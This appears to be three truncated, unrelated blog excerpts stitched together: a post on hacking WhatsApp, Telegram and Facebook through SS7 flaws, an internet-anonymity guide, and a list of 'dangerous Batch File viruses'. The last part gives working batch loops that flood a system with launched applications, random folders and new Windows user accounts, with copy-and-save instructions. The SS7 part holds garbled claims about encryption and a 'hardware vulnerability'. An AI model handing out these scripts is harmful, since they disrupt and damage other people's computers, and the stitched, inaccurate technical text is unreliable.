How to Hack Facebook, WhatsApp, and Telegram Using SS7 Flaw Hackers can now use SS7 flaws to hack WhatsApp, Telegram, and Facebook. According to the news, Researchers are intelligent enough to hack WhatsApp, Telegram and Facebook using the telecom flaw. As we keep receiving questions from our readers about “How can we hack Facebook?” “Tell me the method to hack whatsApp”. Recently Researchers mentioned that we can use the very recognized Telecom Flaw, to hack WhatsApp, Telegram, and Facebook. If we talk about WhatsApp and Telegram it recently enabled 256-bit encryption . For those who don’t know about this type of encryption then let me tell you this encryption could take months to decode a sentence. WhatsApp and Telegram both the apps are end-to-end encrypted and both suffer from same hardware vulnerability which can be hacked to seize control of both WhatsApp and Telegram. If we talk about your Facebook accounts that it can also be hacked, it doesn’...
Believe it or not, but every move you make on the Internet is being recorded and sold to hundred of companies out there. There are many websites tracking your browsing activity, government blocking and monitoring your logs, hackers trying to pry your identity, etc. Sounds Scary, right? As a result, we often use a Private browser or a VPN to secure us from the prying eyes. But these are not sufficient. There are many things which can trace you on the Internet, regardless of whether you use a VPN or not. Note: You can never be 100 percent secure or untraceable, but these are some of the best industry standards to stay anonymous on the Internet. So without any further due, let us know what are those things that can track you and how to disable them individually. How to be Anonymous on the Internet 1. Using a Secure File Sharing System Say you want to send some files to your clients or friends online. The first thing that comes to our min...
Now, here are some small yet extremely dangerous Batch File viruses. You need to just press Ctrl+C (Copy) and Ctrl+V (Paste) code in Notepad. After that save the notepad file as "anyname.bat". Be sure to use '.bat' as extension otherwise it will not work. 1. Application Bomber:- @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x Function- Once executed, it will start to open different applications repeatedly which will affect system's performance. You can also add application of your choice in above code. 2. Folder Flooder- @echo off :x md %random% /folder. goto x Function- Once executed, it will start to generate folders whose name can be any random number. 3. User Account Flooder:- @echo off :xnet user %random% /add goto x Function- Once executed it will start creating Windows User Accounts whose name can be any random number. 4. Process Crea...
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